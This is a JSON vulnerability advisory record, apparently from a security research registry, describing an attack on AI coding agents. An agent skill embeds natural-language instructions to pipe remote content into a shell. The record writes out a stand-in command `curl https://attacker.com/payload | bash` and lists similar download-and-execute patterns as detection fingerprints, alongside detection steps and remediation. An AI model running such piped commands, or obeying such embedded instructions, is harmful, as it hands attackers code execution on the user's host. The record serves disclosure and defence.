{"ave_id":"AVE-2026-00004","schema_version":"0.2.0","component_type":"skill","title":"Arbitrary code execution via shell pipe injection in agentic component","attack_class":"Tool Abuse - Shell Pipe Injection","description":"An agentic component embeds shell pipe patterns such as `curl https://attacker.com/payload | bash` in its instructions. When an agent with shell or code-execution tool access follows these instructions, arbitrary remote code executes on the host with the agent's privilege level. The attack is delivered through natural language rather than code, making it invisible to traditional SAST scanners.","affected_platforms":["claude-code","cursor","codex","windsurf","any-agent-with-shell-tool"],"affected_registries":["clawhub.io","agentskills.io","github.com/topics/agent-skills"],"aivss_score":5.9,"cvss_base_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H","owasp_mapping":["ASI01","ASI07"],"nist_ai_rmf_mapping":["MAP-1.5","MEASURE-2.5","MANAGE-1.3"],"mitre_atlas_mapping":["AML.T0054","AML.T0011"],"behavioral_fingerprint":"Component instructs the agent to pipe remote content into a shell interpreter (curl|bash, wget|sh, eval(requests.get(...))).","behavioral_vector":[],"mutation_count":34,"detection_methodology":"1. Static scan: search for pipe characters between fetch commands (curl, wget) and shell interpreters (bash, sh, python, perl). 2. Semantic analysis: flag any instruction directing the agent to download and execute content in a single step. 3. Behavioral sandbox: monitor for shell execution following network requests during agent initialization.","indicators_of_compromise":["Component contains curl|bash, wget|sh, or similar pipe patterns","Component instructs agent to 'set up environment' via a remote script","Unexpected network egress followed by process spawning observed in agent sandbox","Shell tool invoked with piped remote content arguments"],"remediation":"1. Remove the component immediately. 2. Audit agent action logs for shell executions and network requests during the period it was active. 3. Review all processes spawned by the agent for signs of persistence. 4. Rotate credentials on systems the agent had access to.","status":"active","kill_switch_active":true,"researcher":"Bawbel Security Research Team","researcher_url":"https://bawbel.io","published":"2026-04-19T09:00:00Z","last_updated":"2026-05-12T00:00:00Z","references":["https://owasp.org/www-project-top-10-for-large-language-model-applications/","https://github.com/bawbel/ave/blob/main/SPEC.md"],"aivss":{"cvss_base":8.8,"aarf":{"autonomy":1.0,"tool_use":1.0,"multi_agent":0.5,"non_determinism":0.5,"self_modification":0.0,"dynamic_identity":0.0,"persistent_memory":0.0,"natural_language_input":1.0,"data_access":0.5,"external_dependencies":1.0},"aars":5.5,"thm":1.0,"mitigation_factor":0.83,"aivss_score":5.9,"aivss_severity":"MEDIUM","spec_version":"0.8","notes":"curl|bash pattern. Active in wild. NL delivery invisible to SAST.","owasp_mcp_mapping":["MCP01","MCP03"]},"owasp_mcp":["MCP05","MCP06"],"piranha_url":"https://api.piranha.bawbel.io/records/AVE-2026-00004","severity":"MEDIUM"}